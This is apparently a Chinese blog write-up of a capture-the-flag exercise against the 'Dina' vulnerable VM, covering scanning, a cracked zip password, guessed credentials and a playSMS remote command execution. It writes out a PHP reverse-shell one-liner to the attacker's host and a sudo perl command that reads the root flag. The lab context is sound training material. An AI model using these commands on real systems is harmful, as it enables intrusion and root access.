Bootstrap

dina虚拟服务器,Dina渗透

Dian 是一台渗透测试用的虚拟环境,只是用于娱乐的主机,不过玩的还是挺开心的。写点笔记作为参考。使用的网络环境为 NAT 模式。

发现目标主机

利用扫描工具 nmap 扫描目标网段,寻找存活的目标主机。我的 NAT 模式网段在 192.168.43.1 这个网段上,可以用命令:

nmap 192.168.43.0/24

扫描目标端内所有的存活主机

edb2d19bee54610769b6265ec0be5a80.png

发现目标主机:192.168.43.130

开放端口:80

访问目标服务器

ad1df3130fa8b2b8955f30b089c65020.png

查看源代码什么的,发现没有什么入口什么的。可能需要寻找其他的入侵点。

发现登录入口

没事就看看 robots.txt,没准就有惊喜。查看 robots.txt。真的有惊喜!!!

1

2

3

4

5

6

User-agent: *

Disallow: /ange1

Disallow: /angel1

Disallow: /nothing

Disallow: /tmp

Disallow: /uploads

这几个几个页面依次访问一下,除了nothing这个页面,其他的都一个个文件夹,一度让我以为是文件上传,卡了很久。。。。。。头疼。后来想了一下,会不会还有什么页面没有出现,用dirb–kali 下的一个扫描的软件–默认字典就够了。

发现页面:http://192.168.43.130/secure/,访问得到一个压缩包,打开需要密码,结合前面 noting 页面发现的几个密码,一个个尝试发现工作量也不是很大,或者使用 zip2John 爆破,可以发现密码为freedom

nothing 页面发现的密码:

365244e3587f2f8f8a7e48edbe718aad.png

打开压缩包,提取文件,是一个后缀为 MP3 的文件,但是。。。我并不想听音乐,所以,先用 strings 命令查看一下有没有特殊的东西,有线索。。

cc1b8a9b993b5d765178546f8377fdf2.png

ok,发现新的页面,继续访问,是个登录页面,从压缩包中获取的文件得知,只有用户名,密码还是得一个个试。。。。测试过后得到:

username:touhid

password:diana

getshell

登录,发现是一个 playSMS 的网站,上网找一下有没有漏洞,早 exploit-DB 上面发现一个远程命令执行,发现可以使用,具体漏洞:https://www.exploit-db.com/exploits/42044。查看可知漏洞的点在于电话簿用户信息的导入,具体利用方式在漏洞说明中很清楚。直接可以使用。

漏洞利用文件:

3fa2f61c7ec2874b4b11c690568b0355.png

上传,利用 burpsuite 抓包,由于执行的命令在 USER_AGENT,所以修改 http 请求的 USER_AGENT 的内容为我们要执行的命令就可以了。

91d6205e88bde7af20fc8b0971f2e17f.png

结果:

5254fc0a5e8de4a472af15cf42d950f2.png

下一步就是反弹 shell 了,我的 kali 攻击机的 IP 地址为:192.168.43.129,所以把 shell 反弹到这就行了,监听 kali 的 8008 端口:

fb08cfbfa7d382cee2660effd99932ab.png

利用命令:

php -r '$sock=fsockopen("192.168.43.129",8008);exec("/bin/sh -i &3 2>&3");'

getshell:

e936d1587ab0e2fd4fc05fc72ce74a1b.png

成功进入主机!!!

1

sudo perl -e 'exec "cat /root/flag.txt";'

4c1a407792941a2066516444a6eb53d8.png

hack it!!

;